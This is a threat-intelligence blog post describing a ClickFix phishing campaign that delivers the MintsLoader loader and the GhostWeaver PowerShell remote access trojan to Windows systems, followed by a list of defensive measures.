The Phantom Payload Haunting Windows: MintsLoader and GhostWeaver's Stealth Campaign
- Javier Conejo del Cerro
- 2 may
- 3 Min. de lectura
Fake browser update pages are back, but this time, they bring ghosts. A new phishing campaign leveraging a technique known as ClickFix is distributing a stealthy infection chain involving the malware loader MintsLoader and the PowerShell-based remote access trojan (RAT) GhostWeaver. The campaign targets Windows systems and evades detection using a combination of sandbox evasion, domain generation algorithms (DGA), and encrypted command-and-control (C2) traffic secured through self-signed certificates. This kind of campaign reflects the increasing sophistication of social engineering tactics used to lure users into launching malware with just a few clicks.
The Setup: Industrial sectors in the crosshairs
The attackers have set their sights on high-value targets. Organizations in the industrial, legal, and energy sectors have all been identified as primary victims. Using phishing emails and drive-by links, attackers direct users to ClickFix pages—malicious sites disguised as legitimate browser update prompts. Unlike traditional drive-by downloads that exploit browser vulnerabilities, ClickFix relies on user interaction. Victims are tricked into copying and pasting JavaScript or PowerShell code into their terminal or browser console, unknowingly executing the first stage of the malware chain.
This human-driven infection method adds a layer of complexity for defenders: the user is the one delivering the malware. Once the script is run, it launches MintsLoader—a purpose-built loader with minimal capabilities beyond delivering its payload and evading detection.
Ghost drop through ClickFix
Upon execution, MintsLoader initiates a multi-stage infection process. It deploys using obfuscated JavaScript and PowerShell, crafted to bypass sandboxing and virtual machine analysis. MintsLoader’s core functionality is to download and execute additional payloads. It connects to a command-and-control server using a domain generated daily through a DGA, making it harder to block or track communications.
The next stage involves downloading GhostWeaver, a sophisticated PowerShell-based RAT that communicates with its C2 infrastructure over HTTPS. What sets GhostWeaver apart is its use of a self-signed, obfuscated X.509 certificate embedded directly within its script. This certificate not only encrypts traffic but also serves as a method of client-side authentication, making detection and interception of C2 communications much more difficult.
GhostWeaver’s capabilities include:
Stealing browser credentials, including passwords and session tokens.
Accessing browsing histories and other user-specific data.
Injecting malicious HTML into live browser sessions, enabling phishing overlays or fake input forms.
Delivering and executing additional plugin-based payloads to expand functionality.
This modularity allows GhostWeaver to adapt to different objectives, from credential theft to espionage and beyond. Its stealth-focused design ensures it can linger within systems undetected for extended periods.
Defense measures: Ghostbusting before it's too late
Mitigating a threat like this requires both user awareness and technical controls. Organizations should adopt a multi-layered defense strategy that includes:
Blocking access to known malicious domains, particularly those associated with fake update sites.
Filtering incoming scripts for high entropy, obfuscation patterns, and known indicators of compromise.
Monitoring execution of PowerShell and MSHTA commands, both common tools abused in malware delivery.
Inspecting encrypted outbound traffic for anomalies, including unusual self-signed TLS certificates.
Detecting domain generation algorithm (DGA) behavior in DNS logs, which can indicate malware beaconing to a rotating C2 infrastructure.
Auditing endpoints for persistence mechanisms, including registry edits, scheduled tasks, and unauthorized browser plugin activity.
Training end users to recognize fake update pages and avoid copying code from unverified sources is also critical. Awareness is the first line of defense when social engineering is involved.
Commentaires